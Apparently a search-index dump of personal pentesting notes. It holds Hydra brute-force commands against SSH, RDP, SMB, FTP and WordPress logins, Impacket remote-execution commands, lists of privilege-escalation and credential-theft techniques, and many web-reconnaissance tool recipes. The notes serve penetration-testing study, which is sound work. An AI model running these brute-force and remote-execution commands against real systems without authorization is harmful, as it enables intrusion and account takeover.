                        # Main syntax:\nhydra -L users.txt -P pass.txt <service://server> <options>\n\n# Get information about a module\nhydra -U rdp \n\n\n# Attack a telnet service\nhydra -L users.txt -P pass.txt telnet://target.server  \n\n# Attack a ssh service\nhydra -L user.list -P password.list ssh://$ip\n\n# Attack 3389 RDP\nhydra -L user.list -P password.list rdp://$ip\n\n# Attack samba\nhydra -L user.list -P password.list smb://$ip\n\n# Attack a web resource\nhydra -L users-txt -P pass.txt http-get://localhost/   \n# -l: specify login name\n# -L: specify a list with login names\n# -p: specify a single passwords\n# -P: specify a file with passwords\n# -C: specify a file with user:password\n# -t: how many parallel connections to run when cracking\n# -V: verbose\n# -f: it stops the attack after finding a password\n# -M: list of servers to attack, one entry per line, \u2018:\u2019 to specify port\n\n# To see sintax of the http-get and http-post-form modules:\nhydra -U http-post-form   \n# This will return:\n#    <url>:<form parameters>:<condition string>[:<optional>[:<optional>]\n#    Example: \u201c/login.php:userin=^USER^&passin=^PASS^:incorrect\u201d\n#    it perform the attack in the login.php page. It uses the input label name userin (or any other, we need to retrieve this from the html code of the form) to insert the dictionary for users. It uses the input label name passin  (or any other, we need to retrieve this from the html code of the form) to insert the dictionary for passwords. It uses the word incorrect to check out the result of the login process (we need to observe the web behaviour to pick a word). For example:\nhydra -l pentester -P /usr/share/wordlists/metasploit/password.lst zev0nlxhh78mfshrhzvq9h8vm.eu-central-4.attackdefensecloudlabs.com http-post-form \"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:S=Success\"\n\n\n# Example for ftp in a non default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#real-life-examples","title":"Real-life examples","text":"
                        hydra crack.me http-post-form \u201c/login.php:usr=^USER^&pwd=^PASS^:invalid credential\u201d -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f\n\nhydra 192.168.1.45 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V\n\nhydra -l student -P /usr/share/wordlists/rockyou.txt  ssh://192.153.213.3\n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"i3/","title":"i3 - A windows management tool","text":"

                        Some tips from an experienced user: https://www.reddit.com/r/i3wm/comments/zjq8yf/some_tips_on_how_to_take_advantage_of_i3wm/ https://github.com/cknadler/vim-anywhere https://i3wm.org/docs/userguide.html

                        "},{"location":"i3/#config-file","title":"Config file","text":"

                        Located at ~/.config/i3/config

                        You can add your own configurations.

                        "},{"location":"i3/#quick-guide","title":"Quick guide","text":"
                        # Open a terminal windows. By default it will open horizontally\n$mod+Enter\n\n# Open vertically next window\n$mod+v\n\n# Open horizontally next window\n$mod+h.\n\n# Select your parent container. If you have a selection of containers, then you can do an action on them, like to close them \n$mod+a\n\n# Move the position of the tiled windows \n$mod+Shift+Arrows // and move the windows around\n\n# Close a window\n$mod+Shift+Q\n\n# Enter full-screen mode\n$mod+f\n\n# Switch workspace\n$mod+num // To switch to workspace 2: $mod+2.\n\n# Moving windows to workspaces\n$mod+Shift+num // where num is the target workspace\n\n# Restarting i3\n$mod+Shift+r\n\n# Exiting i3\n$mod+Shift+e\n
                        "},{"location":"i3/#customization","title":"Customization","text":""},{"location":"i3/#locking-screen","title":"Locking screen","text":"

                        In my case I've added a shortcut to lock the screen:

                        # keybinding to lock screen\nbindsym $mod+Control+l exec \"i3lock -c 000000\"\n

                        This requires having installed the tools i3lock (allegedly already installed) and xautolock (not preinstalled)

                        sudo apt install i3lock xautolock\n
                        "},{"location":"i3/#scratchpad","title":"Scratchpad","text":"

                        Also, I've added scratchpad shortcuts

                        # Make the currently focused window a scratchpad\nbindsym $mod+Shift+space move scratchpad\n\n# Show the first scratchpad window\nbindsym $mod+space scratchpad show\n
                        "},{"location":"impacket-ntlmrelayx/","title":"ntlmrelayx - a module from Impacket","text":"","tags":["pentesting","smb"]},{"location":"impacket-ntlmrelayx/#installation","title":"Installation","text":"

                        Download from: https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py

                        ","tags":["pentesting","smb"]},{"location":"impacket-psexec/","title":"Impacket PsExec","text":"

                        The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

                        ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#installation","title":"Installation","text":"

                        Donwload from: Impacket PsExec\u00a0-

                        ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#basic-commands","title":"Basic commands","text":"
                        # Get help \nimpacket-psexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n
                        ","tags":["pentesting","smb"]},{"location":"impacket-smbexec/","title":"Impacket SMBExec","text":"

                        Impacket SMBExec\u00a0- A similar approach to PsExec without using\u00a0RemComSvc. The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.

                        ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#installation","title":"Installation","text":"

                        Donwload from: Impacket PsExec\u00a0-

                        ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#basic-commands","title":"Basic commands","text":"
                        # Get help \nimpacket-smbexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n
                        ","tags":["pentesting","windows"]},{"location":"impacket/","title":"Impacket - A python tool for network protocols","text":"","tags":["pentesting","windows"]},{"location":"impacket/#what-for","title":"What for?","text":"

                        Impacket is a collection of Python classes for working with network protocols. For instance:

                        • Ethernet, Linux \"Cooked\" capture.
                        • IP, TCP, UDP, ICMP, IGMP, ARP.
                        • IPv4 and IPv6 Support.
                        • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
                        • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
                        • Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
                        • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
                        • Portions of TDS (MSSQL) and LDAP protocol implementations.
                        ","tags":["pentesting","windows"]},{"location":"impacket/#installation","title":"Installation","text":"
                        git clone https://github.com/SecureAuthCorp/impacket.git\ncd impacket\npip3 install .\n\n# OR:\nsudo python3 setup.py install\n\n# In case you are missing some modules:\npip3 install -r requirements.txt\n\n# In case you don't have pip3 (pip for Python3) installed, or Python3, install it with the following commands\nsudo apt install python3 python3-pip\n
                        ","tags":["pentesting","windows"]},{"location":"impacket/#basic-tools-included","title":"Basic tools included","text":"
                        • samrdump
                        • smbserver
                        • PsExec
                        ","tags":["pentesting","windows"]},{"location":"index-linux-privilege-escalation/","title":"Index for Linux Privilege Escalation","text":"Guides to have at hand
                        • HackTricks. Written by the creator of WinPEAS and LinPEAS.
                        • Vulnhub PrivEsc Cheatsheet.
                        • s0cm0nkey's Security Reference Guide.

                        This is a nice summary related to Local Privilege Escalation by @s4gi_:

                        ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"

                        Some basic commands once you have gained access to a Linux machine:

                        whoami\npwd\nid\nuname -a\nlsb_release -a\n
                        ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

                        Enumeration scripts

                        • Scan the Linux system with \"linEnum\".
                        • Search for possible paths to escalate privileges with \"linPEAS\".
                        • Enumerate privileges with \"Linux Privilege Checker\" tool.
                        • Enumerate possible exploits with \"Linux Exploit Suggester\" tool.
                        ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

                        Techniques

                        • Cron jobs: path, wildcards, file overwrite.
                        • Daemons.
                        • Dirty cow.
                        • File Permissions:
                          • Configuration files.
                          • Startup scripts.
                          • Process capabilities: getcap
                          • Suid binaries: shared object injection, symlink, environmental variables.
                          • Lxd privileges escalation.
                        • Kernel vulnerability exploitation.
                        • LD_PRELOAD / LD_LIBRARY_PATH.
                        • NFS.
                        • Password Mining: logs, memory, history, configuration files.
                        • Sudo: shell escape sequences, abuse intended functionality.
                        • ssh keys.
                        ","tags":["privilege escalation"]},{"location":"index-windows-privilege-escalation/","title":"Index for Windows Privilege Escalation","text":"Guides to have at hand
                        • HackTricks. Written by the creator of WinPEAS and LinPEAS.
                        • Vulnhub PrivEsc Cheatsheet.
                        • s0cm0nkey's Security Reference Guide.

                        This is a nice summary related to Local Privilege Escalation by @s4gi_:

                        ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

                        Enumeration scripts

                        • Windows Privilege Escalation Awesome Scripts: winPEAS tool.
                        • Seatbelt.
                        • JAWS.
                        ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

                        Techniques

                        • Services:
                          • DLL Hacking.
                          • Uniqued Path.
                          • Named Pipes.
                          • Registry.
                          • Windows binaries: LOLBAS.
                          • bin Path.
                          • Abusing a service with PowerUp.ps1
                        • Kernel.
                        • Password Mining:
                          • Cached SAM.
                          • Cached LSASS.
                          • Pass The Hash.
                          • Configuration files: unattend.xml, SiteList.xml, web.config, vnc.ini.
                          • Logs.
                          • Credentials in recently accessed files/executed commands
                          • Memory: mimiktenz, Process Dump (minidump).
                          • .rdp Files.
                          • Registry: HKCU\\Software\\USERNAME\\PuTTY\\Sessions, AutoLogon, VNC.
                        • Registry:
                          • Autorun.
                          • AlwaysInstallElevated
                        • Scheduled Tasks:
                          • Binary Overwrite.
                          • Missing binary.
                        • Hot Potato.
                        • Startup Applications
                        ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-tools","title":"Privilege escalation tools","text":"
                        • CrackMapexex.
                        • mimikatz.
                        ","tags":["privilege escalation","windows"]},{"location":"information-gathering/","title":"Information gathering","text":"Sources for these notes
                        • Hack The Box: Penetration Testing Learning Path
                        • INE eWPT2 Preparation course
                        • OWASP Web Security Testing Guide 4.2 > 1. Information Gathering
                        • My own notes coming from experience pentesting.
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#methodology","title":"Methodology","text":"

                        Information gathering is typically broken down into two types:

                        • Passive information gathering - Involves gathering as much information as possible without actively engaging with the target.
                        • Active information gathering/Enumeration - Involves gathering as much information as possible by actively engaging with the target system. (You will require authorization in order to perform active information gathering).
                        Passive Information Gathering Active Information Gathering/Enumeration Identifying domain names and domain ownership information. Identify website content structure. Discovering hidden/disallowed files and directories. Downloading & analyzing website/web app source code. Identifying web server IP addresses & DNS records. Port scanning & service discovery. Identifying web technologies being used on target sites. Web server fingerprinting. WAF detection. Web application scanning. Identifying subdomains. DNS Zone Transfers. Identify website content structure. Subdomain enumeration via Brute-Force.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#1-passive-information-gathering","title":"1. Passive information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#11-fingerprint-web-server","title":"1.1. Fingerprint Web Server","text":"

                        Or Passive server enumeration.

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

                        ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#host-command","title":"host command","text":"

                        DNS lookup utility.

                        host domain.com\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whois-command","title":"whois command","text":"

                        WHOIS is a query and response protocol that is used to query databases that store the registered users or organizations of an internet resource like a domain name or an IP address block.

                        WHOIS lookups can be performed through the command line interface via the whois client or through some third party web-based tools to lookup the domain ownership details from different databases.

                         whois $TARGET\n
                        whois.exe <TARGET>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#netcraft","title":"netcraft","text":"

                        Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration.

                        More issues fired up by netcraft: cms, server programming,...

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censys","title":"censys","text":"

                        https://search.censys.io/

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan","title":"Shodan","text":"
                        • https://www.shodan.io/
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wayback-machine","title":"Wayback machine","text":"

                        We can access several versions of these websites using the Wayback Machine to find old versions that may have interesting comments in the source code or files that should not be there.

                        We can also use the tool waybackurls to inspect URLs saved by Wayback Machine and look for specific keywords. Installation:

                        go install github.com/tomnomnom/waybackurls@latest\n

                        Basic usage:

                        waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#12-passive-dns-enumeration","title":"1.2. Passive DNS enumeration","text":"

                        A valuable resource for this information is the Domain Name System (DNS). We can query DNS to identify the DNS records associated with a particular domain or IP address.

                        • Complete DNS enumeration guide: definition and techniques.

                        Some if these tools can also be used in Active DNS enumerations.

                        Worth trying: DNSRecon.

                        Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. DNSRecon Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. dnsdumpster.com DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#13-reviewing-server-metafiles","title":"1.3. Reviewing server metafiles","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

                        ID Link to Hackinglife Link to OWASP Objectives 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

                        Some of these files:

                        • robots.txt
                        • sitemap.xml
                        • security.txt (proposed standard which allows websites to define security policies and contact details.)
                        • human.txt (initiative for knowing the people behind a website.)
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#14-conduct-search-search-engine-discovery","title":"1.4. Conduct search Search Engine Discovery","text":"

                        Dorking

                        • Complete google dork guide.
                        • Complete github dork guide.

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

                        ID Link to Hackinglife Link to OWASP Objectives 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#15-fingerprint-web-application-technology-and-frameworks","title":"1.5. Fingerprint web application technology and frameworks","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

                        ID Link to Hackinglife Link to OWASP Objectives 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.

                        If we discover the webserver behind the target application, it can give us a good idea of what operating system is running on the back-end server.

                        For instance:

                        • IIS 6.0: Windows Server 2003
                        • IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2
                        • IIS 10.0 (v1607-v1709): Windows Server 2016
                        • IIS 10.0 (v1809-): Windows Server 2019

                        Although this is usually correct when dealing with Windows, we can not be sure in the case of Linux or BSD-based distributions as they can run different web server versions

                        How to spot a web server?

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers","title":"HTTP headers","text":"

                        X-Powered-By and cookies: - .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE> - PHP: PHPSESSID=<COOKIE_VALUE> - JAVA: JSESSION=<COOKIE_VALUE>

                        More manual techniques on OWASP 4.2: WSTG-INFO-08

                        Banner Grabbing / Web Server Headers

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb","title":"whatweb","text":"

                        whatweb**.

                        whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wappalyzer","title":"Wappalyzer","text":"

                        Wappalyzer**

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f","title":"wafw00f","text":"

                        wafw00f**:

                        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#aquatone","title":"Aquatone","text":"

                        Aquatone

                        cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#builtwith","title":"BuiltWith","text":"

                        Addons BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies which include analytics, advertising, hosting, CMS and many more.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#curl","title":"Curl","text":"

                        Curl:

                        curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap","title":"nmap","text":"

                        nmap:

                        sudo nmap -v $ip --script banner.nse\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#16-waf-detection","title":"1.6. WAF detection","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f_1","title":"wafw00f","text":"

                        wafw00f**:

                        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_1","title":"nmap","text":"

                        nmap:

                        nmap -p443 --script http-waf-detect <host>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#17-code-analysis-httrack-and-eyewitness","title":"1.7. Code analysis: HTTRack and EyeWitness","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

                        ID Link to Hackinglife Link to OWASP Objectives 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#httrack","title":"HTTRack","text":"

                        HTTRack tutorial

                        Create a folder for replicating in it your target.

                        mkdir targetsite\nhttrack domain.com  targetsite/\n

                        Interactive mode:

                        httrack\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#eyewitness","title":"EyeWitness","text":"

                        EyeWitness tutorial

                        First, create a file with the target domains, like for instance, listOfdomains.txt.

                        Then, run:

                        eyewitness --web -f listOfdomains.txt -d path/to/save/\n

                        After that you will get a report.html file with the request and a screenshot of those domains.

                        # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#18-passive-crawling-with-burp-suite","title":"1.8. Passive crawling with Burp Suite","text":"

                        Crawling is the process of navigating around the web application, following links, submitting forms and logging in (where possible) with the objective of mapping out and cataloging the web application and the navigational paths within it.

                        Crawling is typically passive as engagement with the target is done via what is publicly accessible, we can utilize Burp Suite\u2019s passive crawler to help us map out the web application to better understand how it is setup and how it works.

                        BurpSuite Community edition has only Crawler feature available. For spidering, you need Pro edition.

                        OWASP Zap has both Spider and Crawler features available.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#2-active-information-gathering","title":"2. Active information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#21-enumerate-applications-and-services-on-webserver","title":"2.1. Enumerate applications and services on Webserver","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

                        ID Link to Hackinglife Link to OWASP Objectives 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers

                        Hostname discovery

                        nmap --script smb-os-discovery $ip\n

                        Scanning the IP looking for services:

                        nmap -sV -sC -- <target>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#22-web-server-fingerprinting","title":"2.2. Web Server Fingerprinting","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

                        ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers-and-source-code","title":"HTTP headers and source code","text":"

                        HTTP headers and HTML Source code (with Burpsuite and curl). Or CRTL-u on the browser to see the source code.

                        • Note the response header Server, X-Powered-By, or X-Generator as well.
                        • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
                        • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_2","title":"nmap","text":"

                        Conduct an scan

                        nmap -sV -F target\n

                        If a server version found is potentially vulnerable, use searchsploit:

                        searchsploit apache 2.4.18\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#metasploit","title":"metasploit","text":"

                        Additionally you can use metasploit:

                        use auxiliary/scanner/http_version\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb_1","title":"whatweb","text":"

                        whatweb.

                        # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors $ip/24\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nikto","title":"Nikto","text":"

                        nikto.

                        nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#23-directoryfile-enumeration","title":"2.3. Directory/File enumeration","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_3","title":"nmap","text":"
                        nmap -sV -p80 --script=http-enum <target>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dirb","title":"dirb","text":"

                        Cheat sheet with dirb.

                        dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster","title":"gobuster","text":"

                        Gobuster:

                        gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,4.4 -x .php,.txt -r \n# -b: exclude from results an specific http response`\n# -r: follow redirects\n# -x: add to the path provided by dictionary these extensions\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#ffuf","title":"Ffuf","text":"

                        Ffuf:

                        ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz","title":"Wfuzz","text":"

                        Wfuzz

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#feroxbuster","title":"feroxbuster","text":"

                        feroxbuster

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#amass","title":"amass","text":"

                        amass

                        amass enum -active -d crapi.apisec.ai  -ip -brute -dir path/to/save/results/\n# enum: Perform enumerations and network mapping\n# -active: Attempt zone transfer and certificate name grabs, among others.\n# -ip: Show ip addresses of cached subdomais.\n# -brute: Perform a brute force dns attack.\n\namass enum -passive -d crapi.apisec.ai -src  -dir path/to/save/results/\n# enum: Perform enumerations and network mapping.\n# -pasive: Performs passive scan\n# src: display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. It actively automate active enumeration. \n

                        Some flags:

                        -active: Attempt zone transfer and certificate name grabs.\n-pasive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show ip addresses of cached subdomais.\n\u2013include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#spidering-with-owasp-zap","title":"Spidering with OWASP ZAP","text":"

                        Spidering is an active technique. It's the process of automatically discovering new resources (URLs) on a web application/site. It typically begins with a list of target URLs called seeds, after which the spider will visit the URLs and identified hyperlinks in the page and adds them to the list of URLs to visit and repeats the process recursively.

                        Spidering can be quite loud and as a result, it is typically considered to be an active information gathering technique.

                        We can utilize OWASP ZAP\u2019s Spider to automate the process of spidering a web application to map out the web application and learn more about how the site is laid out and how it works.

                        BurpSuite Community edition has only Crawler feature available. For spidering, you need Pro edition.

                        OWASP Zap has both Spider and Crawler features available.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#24-active-dns-enumeration","title":"2.4. Active DNS enumeration","text":"

                        Domain Name System (DNS) is a protocol that is used to resolve domain names/hostnames to IP addresses. During the early days of the internet, users would have to remember the IP addresses of the sites that they wanted to visit, DNS resolves this issue by mapping domain names (easier to recall) to their respective IP addresses.

                        A DNS server (nameserver) is like a telephone directory that contains domain names and their corresponding IP addresses. A plethora of public DNS servers have been set up by companies like Cloudflare (1.1.1.1) and Google (8.8.8.8). These DNS servers contain the records of almost all domains on the internet.

                        DNS interrogation is the process of enumerating DNS records for a specific domain. The objective of DNS interrogation is to probe a DNS server to provide us with DNS records for a specific domain. This process can provide us with important information like the IP address of a domain, subdomains, mail server addresses etc.

                        More about DNS enumeration.

                        Tool + Cheat sheet What it does dnsenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. dig discover non-contiguous ip blocks. fierce DNS scanner that helps locate non-contiguous IP space and hostnames. dnscan Python wordlist-based DNS subdomain scanner. gobuster For brute force enumerations. nslookup . amass In depth DNS Enumeration and network mapping.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum","title":"dnsenum","text":"

                        dnsenum Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. Used for active fingerprinting:

                        dnsenum domain.com\n

                        One cool thing about dnsenum is that it can perform dns transfer zone, like [dig]](dig.md). dnsenum performs DNS brute force with /usr/share/dnsenum/dns.txt.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dig","title":"dig","text":"

                        Additionally, see dig axfr.

                        dig (More complete cheat sheet: dig)

                        #Syntax for dns transferring a zone\ndig axfr @nameserver example.com\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce","title":"Fierce","text":"

                        Fierce (More complete cheat sheet: fierce)

                        # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnscan","title":"DNScan","text":"

                        DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

                        dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_1","title":"gobuster","text":"

                        gobuster (More complete cheat sheet: gobuster)

                        gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nslookup","title":"nslookup","text":"

